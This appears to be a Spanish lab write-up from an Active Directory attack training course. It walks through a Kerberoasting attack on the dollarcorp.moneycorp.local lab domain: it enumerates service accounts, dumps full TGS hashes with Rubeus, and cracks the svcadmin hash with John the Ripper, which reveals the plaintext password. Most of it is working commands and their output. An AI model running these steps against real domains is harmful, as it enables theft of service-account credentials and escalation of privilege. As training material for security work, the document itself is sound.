Learning Objective - 14
Listamos los servicios en el AD.
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-719815819-3726368948-3917688648-502
Surname :
UserPrincipalName :
DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : True
GivenName : web
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID : S-1-5-21-719815819-3726368948-3917688648-1114
Surname : svc
UserPrincipalName : websvc
DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : True
GivenName : svc
Name : svc admin
ObjectClass : user
ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID : S-1-5-21-719815819-3726368948-3917688648-1118
Surname : admin
UserPrincipalName : svcadmin
PS C:\AD\Tools\ADModule-master\ActiveDirectory>Obtenemos la info
PS C:\AD\Tools> .\Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName : websvc
[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*websvc$dollarcorp.moneycorp.local$SNMP/ufc-adminsrv.dollarcorp.mone
ycorp.LOCAL@dollarcorp.moneycorp.local*$3038292181B38C48503A748FE29CD0A4$1C49364
E5FCDCC03A6C0EB4B0DC2DDA33ECF4C8A94366F0B559C87BAC55A7425AE724B2E832985B8B3F1F63
55B2616E4F9DD7C522F5669AB6A9D44428459304B49B50AC239FD827BEFA19E9A5B3CD685F67CE71
92473F1CF7991DDD47EAE72915854F4DD500F592BB0AEA6A099AB176C3A547FC51CD1461541CA7E6
1097A734973214ED9E0AE2FD88B77482F743D9B627E9D68DC6841FC335E9F36503E6EB01315AFFFF
1658261689CEBBE7BF6F7C0EE9F1AF5A63EB8FE904049F375788E7A1F5739D969238C9291C4A6735
7B700232FFA22AEAB006AD6DA817660CA178BFA46A1893EE1BD1F726B5AE2656BFB8C86F0D0CA8CA
05FA750016C16FF0E54E835649227940A3DA0519C5E0F12AAEEF2ACC055575AD9B9F1424F6F986AA
11A94C6D2E55D9182F27F0DE790BB3ADCC26EEE0A44AB7C5CBD3AB57BEA4FD0AB4EF89C6F9EC70BE
44861432253C3DB504E4E106CEAA600F24F5B15D0F4E16F3C79A76F1CA1093496EE9CDC3A75FD104
C5D79B9FEA6C3F1975D1C164CCE13C3F4E20DBA1871EA1F80290CE3C355077FC6D84EF50F6465A9B
6A0F101029C4EEB5A0BFF3755F24D3D859348DA49B90823BA4AB1A2C819276F86B8976A90F2615D9
B5B78BF382D73D4856FEC74313C9D351E7CD44AAC9FD69686B93E3DA49261159DBAE04B28A26B81D
09E083CBBCD627891D8EF103EBF9C137B43E31C53D4700503D4FA9A3AE7AEB9EA452E65001DFAAF0
F799C26ADD436E16657521369430731CEE9A5E58465C33C63302594C2A7F1AF4BDFED8D7D2D3777C
BB55E2BD17F546962D3061ECBC509470589B188D1C1435AAE2C712B8999E6A8CC3843E1CCCACBB9E
DD1A2CBD64441DE79D2365E5E9601615A91F80B10CBEA2A0863575A1D140A695715BFEDF1BA8C47A
996B342430581B34164DBC5AEB1191C0210C27FA80D0FDF03C21EC0F890833AB886505AD0A7568CC
514E221DCBF27F462EE78FF29EA76373920D97A4121F9566CAF96068878A1CD362FA285C9A0FF18E
7E36AA0368A67B7B78CF01BFCAC66262072576631E818681BFAD7C9358C5151C8E469C3573DDE5C3
510AE067A1865E289B53F993270AB1EC67C77672624454B3F462C8E881CFAF65DEA0F17944567781
2538C7C29F7589660EED111E4EE5CF934517449A653348F0014DDB56359900CF43D72A697A7D5741
C633CD8BED5306AC771A0664DAD9B49CF1AA510CCBD21D4565F363D9B7E103DD800BF904ED962C64
8F8165CC8ACC8D474D7C2C9972EF7E974AFED2981D25BAE4011DE4287709A9E9EE35501D3FA1B889
9BF6CCB3433EA1052183B049959BE858B035BAB971C23B5ECEFBD09E1AB78905A006D0F9AC341546
763620DF1B73B838797CBB1A406939B0868C65603DDDAC14CD9FAAC410509F351342C4540977899B
DC847D302D870AC587143ED3E7B81D2E009304B2F2DCE86E7E13E6117878983F1361AAC169FA7EA9
89D5139BC577EEC2F62466EBCEB843F909449DD5D5859A0D084A74A6976B1CB5B6C629361FE3138B
0A3EAF5DFF4A1F45E81E6F70B38E4BDED57A023DAD884B13ED5EA80F0A51988F64FEF577E5E7F62E
3478A02ECE50631746546F5F1BA93ED23CA36347931F98DA9FC956216A8027B40EC6DF7B5C1E2A9E
9F7C15C2D8784D15BAE0017F9422CC5C9B291835B5916AA8FD82A6CC9E98D7C9414EDB9E5941294F
B8581CFA27B1E627D32F6624D120DAA5AE2248975A9769E974DDBD59D9D976FEDD6113002218EA73
A1D1526C2CDFB089E39929F2CABF6562588F0587C1DB6D66E029D095AB127CC21B8D13609E1E6572
982CE37
[*] SamAccountName : svcadmin
[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-mgmt.dollarcorp.
moneycorp.local:1433@dollarcorp.moneycorp.local*$8DED9453E15D1F4E6640695E0CE1863
5$BD9C24E624614B8590DD68ABE4AD46CCC3E5CFF83C85FA001DD2321B6389FBA38762FD25AEF271
B2651B3047514372AA07FB9D59785FC2750B4D34F402DEE9E077DF1B912A3833BBDA24EB7F4344C2
FEE9FD4B12651D1B8E2C07F6C3DC0384BDF10592771C6AC70765F8763393AC464291262912535A62
7F52BE7B31AF74F6849A9C14BEFE2685F14A2CFA99365BCD16A5816CB1E267F89B5184A87D9B7715
D774BAA8F5F6E4A3BE1FD85E842ABD409D89B8B3A72206F6B37C1261F713C5BD60577B2AF50C0AA6
68C3568127D7D0F667F8B19833EF3EE8E6E88416727E1F26AD677F7AC013955E5367DBF39F6A04BA
5EC79015FC411986355ABF7B50B100584A3A45835C772366BDE609092EF1BC7DBE1EC73762D7618A
8348E02B241EDA1358E145B489A5619845793E7ADE0401C7B790B0F0D7CF25096802B7451DE24A71
F247777CF91A39CC7A99D935FDA62F506961DDE3653DE602A002DC15EECC191A3B90078F9D23D25E
E36BA0A29099C4BFB2E0C2A5CFA18DB89BCBD7B8C496A1328F270DCF20ECCFC88164DEA8E5862359
248D25ADC788181CD68C32FF479C29CE4E1D4806B20EF41FC3E21D11B64EBBDB6A73A0CDE65D7F99
0485696571DB6C599C9E1A29B12E7F256134CECA049FD2C727DBDA6621470E670EAECEB7F0C605AD
94D6814D5C3F94DAAFD856F70BBC06899ACC6AA10FF96088066BD70B9E93B378770E500C748D8C4B
F80885ED12415B1CCE3BA7555EA762608A9EC4658B2FD2B73B905F71415AF6E5FC03FAB3C1DB7CD0
DB3D92CBD9E67EE98D07DD38D2E1BEB228FF78AF7BCD01482E30E171702E3F1DFFA59375C65E412F
94A1258A36C1A88FCB81E4D1C551CB35C3AE0B3BF6CEB46FF5C118FD6DA4C14321A67733850ED463
CA4E790884D04154A1090F21E025ABA309C0587FFAB203631338B23BE417346DBE92BAA4BFAA63F6
3FAD9AFA8DB2585ED1A6C855A5ED5B6B2D98619914132BCCC679A454DBC70C96232CC1B618A98120
9C7CDB0FEEE9EE7CE0D8F630F593C939BCF985DDEB29556CC5BCD990E980CAA73C3366F18BDE6235
FB7AF49DC013A886A873710B56C37FF1117D967019E6C93B9179CBDC005280B22E7465EDFE0C15BC
291CDAFDE7E4BC2A1176B6AB60FD00068486DBFF28AFA29EFAA436D1C595EF154FAA725227CF24BC
B93E07D7E652061E6B77415F7919BD34ECE67D82302F6168CD3995214C52B5BA853D832568233DBF
C22779149E29345D9D4D87BBB459870E7CA431D8F7DE34D245AF7B061BD5C361EBA0595FDE1647B1
BE388E982D9B5F99F32D19009AF6EAEE73600E1AF0A8954D3BE6C6FF9930AB0C6AD25251A273F8F1
47A9E343B7CD82D57A79C3418E8111481BC337627D849655D2BD71C6E30ABDD15D4CA10CA4159B44
B979D4123467F84AAB28350A5E2978F299D58FF1B9A875E8DAF1E789B03DA396A459DE7B7BEB5E91
8FB1F00C8AC9BA163B712381E61A3C21E7B2BBD160284A1A4B43F1A31C557B221FE65B54CBE38E13
663CAF238089A110E4AE14B66E25D425BD23653F10F0FE0E6595DB079E16EA65AB728CE493B11B8B
C59EEC0B898908BE1A3F52AE91A90FA62A8FFB401381E61476CB61EC9CA88CB872C5C02350612568
6056E7940A1D79F7F4783200728322B5C3922C30140647781BCAF41C5F00EE083B400CC201F5B0D3
94776977098C93F9BE8CA6D40AE111729479A2EDA565E075528843D8A7C7C75F9D8718CF02B0D73A
40338C0C6C1E39AED7B9D59461F5FAD44568711025AF60988AF7E8F684B454ED9681A3E0D810C44E
531499D3E5A97A28o tambien
PS C:\AD\Tools> .\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:hash.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Target User : svcadmin
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'
[*] Total kerberoastable users : 1
[*] Hash written to C:\AD\Tools\hash.txt
[*] Roasted hashes written to : C:\AD\Tools\hash.txtNO OLVIDEMOS ENTRAR AL ARCHIVO hash.txt y eliminar el puerto del servicio SQL antes de crackear.
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2024-03-01 05:02) 13.15g/s 26947p/s 26947c/s 26947C/s energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completedLast updated